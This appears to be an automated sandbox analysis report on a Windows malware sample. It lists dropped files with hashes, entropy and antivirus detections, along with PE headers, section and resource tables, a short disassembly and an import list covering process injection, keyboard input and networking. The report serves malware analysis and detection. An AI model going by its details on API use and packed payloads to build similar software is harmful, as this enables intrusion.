                  Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288768
                  Entropy (8bit):7.994960411237261
                  Encrypted:true
                  SSDEEP:6144:p3H4EZg9lZ27hYiL2iAW1Ia3czJbCxG1CzCHid/W/FIphWQZmSjjPpo:pXb+rCYieW1IpzJGmCu+YO/WQZmSjVo
                  MD5:80CFECD52CB7E58C3B6F05C33B4D11B8
                  SHA1:C3F6BECD0F6B737A415EF7B5DC87FFD53D71BE55
                  SHA-256:E38AB7E46B69C8DDA3226EBF64275D1A32E9D62183D1ACDA2C5169572E1F86EF
                  SHA-512:A3A5B2446EC446223AFDB11C166AFCB15AE638486B65EE6341AEAA42A747BC66DC93D977C6009533222D54827B5936F16A6B804BDD1E11C4EF042E35A0B40A32
                  Malicious:false
                  Reputation:low
                  Preview:...T7SOA3G3Q..DT.J8BBVT4.OA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBV.4SOO(.=Q.K.u.Kt.c.<] o1E(T#-/d7;$V-6v6Qs=4YgZ?l...z'W&'xY9YkA7G3QLB=US.."%.iT4.|W .K..n:-.X....3(.-.p"#..#[*.63.SOA7G3QL..TZ.9CB....OA7G3QLB.TXK3CIVTbWOA7G3QLBDTOJ8BRVT4#KA7GsQLRDTZH8BDVT4SOA7A3QLBDTZJHFBVV4SOA7G1Q..DTJJ8RBVT4COA'G3QLBDDZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBj ?2LBBV.aWOA'G3Q.FDTJJ8BBVT4SOA7G3QlBD4ZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3QLBDTZJ8BBVT4SOA7G3Q
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):12320
                  Entropy (8bit):7.98589608850139
                  Encrypted:false
                  SSDEEP:384:EywWjRZv6lbrA9UuonqpkIt8MENtf8WyCbl/:MjlbryonukIaMUtf7yCbB
                  MD5:1B156FCBFCD13D832439548B1B8F0FA6
                  SHA1:FABA56616E2FFAEE4E388988536F58CCBCB730AE
                  SHA-256:B93BEA2790C92EA481537CEDBE44CD4E2DBC95F429C6C4608430684F2D7A5C63
                  SHA-512:1F3BD2240DD318E3E6CCD36CDA14D4CF063D668B42C27BEE838297632D8B195CB315B743B09C1E1D5F84FE66B8B3E35D37B416F96B9BA504FE5566064FDA5CB7
                  Malicious:false
                  Reputation:low
                  Preview:....K.../E..a..to.....:..._C....6f#....A...{p7..2.x?"........'|.#V.K..j...4..N.s+..gh.P....S5O.Mj.4......'.kJ..1.e.*p..2........M...4...D..^{G~.. ....4X6..1..<~..(......3.....kB.PL~...p.?..\r..o..T|..V.E..7(.G..M.f..U..6.$u9.hp*..VA......F.nz.~......\..[.*t.<...J.......9...=/x.....&h...Q..._H....I....'q{t...B.#Yv....*dv...<.D).~.2..d.9~@......e..e.~.X.W..|.......y.=.R...F.*.~z.....b...u.i=......;...Y`".ys....b...p$...6.6........fUW....../.*..Y.$SCo4..|i.hw.~A@0..........nO..T...d..`k.fu*.4...K.o.8..*..R..V.}....cs...p.9.c.J>.n)...@....I..w.%o....oo..c...M.P.Gj....g...A_+.g.eZ..j.}{.....S.YQ...(..F~.Ak...l..y.j.r.^..n...I...7....G.f.=.8...p...'z-.w.0......7....e?\......./).8.v5.}...>.......{s.a~....l..|c......|....k ~.2.s&.nnjB....NZc..........qe...AWY..D..r...{.4f[/...W.r. M...A.n..ZpP....q8wh&.D..Z.nmY,:.SV......e.X.t....[........M.........6...h.....O..p.qqN....T}z.......J..G.Y.M.......a..!....l.JG._..k...O.)....{.B$!..D..9W..,}..
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:PE32+ executable (console) x86-64, for MS Windows
                  Category:modified
                  Size (bytes):1348608
                  Entropy (8bit):7.251556205859396
                  Encrypted:false
                  SSDEEP:24576:vQW4qoNUgslKNX0Ip0MgHCpoMBOuyVg9N9JMlDlfjRiVuVsWt5MJMs:vQW9BKNX0IPgiKMBOuegFIDRRAubt5M
                  MD5:370B058471F7AFC632A937213C7FEAA6
                  SHA1:06A427976DFA93879005B7AEDC44EC50EA681300
                  SHA-256:A06047FD818014781CB086AD2E9B9795973AB5131DB0EAC69073C3A731CD4AF7
                  SHA-512:D17B276BD6B49BED5E6DD55728DFF754AA9A06F6066682DDF96FCB14FE18481750EDE7C1D60F2BA9B53D7ED93E213BB071307DB8799F389DA90C30BCF5FEC732
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):1594368
                  Entropy (8bit):4.17566981094846
                  Encrypted:false
                  SSDEEP:12288:qEP3RFsV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:JFQVg9N9JMlDlfjRiVuVsWt5MJMs
                  MD5:791FE83149B027ED288BF7B3D73209AA
                  SHA1:F0A9C762DD261D68EA34D41860234C1813D3AC8B
                  SHA-256:6537B5BCB1D841674B9374D1AD851EB92514B1EF7469F63D1AB5D2BDAD27EEF9
                  SHA-512:FA0002879C46C324666117FBF0A55C44572B754AFF9B7E4C87EEA8248E6FEB77943274B81FAA202A1B7F51A482B86679FC5800FE7D482AC498C7861148735DCA
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................G-.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.512066633795974
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:UaOJAOMxcU.exe
                  File size:1'777'664 bytes
                  MD5:97a3cc0911d35ed963283afb08b1e671
                  SHA1:129e91e7dbf157743c1ddcc332f3880e99427115
                  SHA256:2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5
                  SHA512:f989ef525b9320f1ebd77a5e8fe0d1248df53030eac4b4f2b3563e2ea80bfd6a54601443674f6580b6b5f76c4f54af1d69f00522ce177e1e180c8805b3770952
                  SSDEEP:49152:md0c++OCvkGs9FahLyOsW++0YxgFIDRRAubt5M:yB3vkJ9yj++0rUf
                  TLSH:E885E02273DDC360CB669173FF6A77056FBB3C610630B85B2F980D79A950162162DBA3
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                  Icon Hash:aaf3e3e3938382a0
                  Entrypoint:0x427dcd
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x6757B1EA [Tue Dec 10 03:13:46 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                  Instruction
                  call 00007F5038DF4B1Ah
                  jmp 00007F5038DE78E4h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F5038DE7A6Ah
                  cmp edi, eax
                  jc 00007F5038DE7DCEh
                  bt dword ptr [004C31FCh], 01h
                  jnc 00007F5038DE7A69h
                  rep movsb
                  jmp 00007F5038DE7D7Ch
                  cmp ecx, 00000080h
                  jc 00007F5038DE7C34h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F5038DE7A70h
                  bt dword ptr [004BE324h], 01h
                  jc 00007F5038DE7F40h
                  bt dword ptr [004C31FCh], 00000000h
                  jnc 00007F5038DE7C0Dh
                  test edi, 00000003h
                  jne 00007F5038DE7C1Eh
                  test esi, 00000003h
                  jne 00007F5038DE7BFDh
                  bt edi, 02h
                  jnc 00007F5038DE7A6Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F5038DE7A73h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F5038DE7AC5h
                  bt esi, 03h
                  jnc 00007F5038DE7B18h
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD4 build 31101
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD4 build 31101
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5b954 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x8dcc4 | 0x8de00 | af54ec0cc55e230eff297c736f22101c | False | 0.5728679102422908 | data | 6.676131910996061 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0xc7000 | 0x5b954 | 0x5ba00 | 11a8839e487c2ce9253c697970277011 | False | 0.9281766925306958 | data | 7.89506970135949 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x123000 | 0x96000 | 0x95000 | ae58810b8356e4276db6e9e1c353eeaa | False | 0.9757563443791947 | data | 7.938045915639303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                  RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                  RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                  RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                  RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                  RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                  RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                  RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                  RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                  RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                  RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                  RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
                  RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                  RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                  RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                  RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                  RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                  RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                  RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                  RT_RCDATA | 0xcf7b8 | 0x52c1a | data |  |  | 1.0003274626073104
                  RT_GROUP_ICON | 0x1223d4 | 0x76 | data | English | Great Britain | 0.6610169491525424
                  RT_GROUP_ICON | 0x12244c | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x122460 | 0x14 | data | English | Great Britain | 1.15
                  RT_GROUP_ICON | 0x122474 | 0x14 | data | English | Great Britain | 1.25
                  RT_VERSION | 0x122488 | 0xdc | data | English | Great Britain | 0.6181818181818182
                  RT_MANIFEST | 0x122564 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                  DLL | Import
                  WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLL | GetProcessMemoryInfo
                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dll | IsThemeActive
                  KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                  Language of compilation system | Country where language is spoken
                  English | Great Britain
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
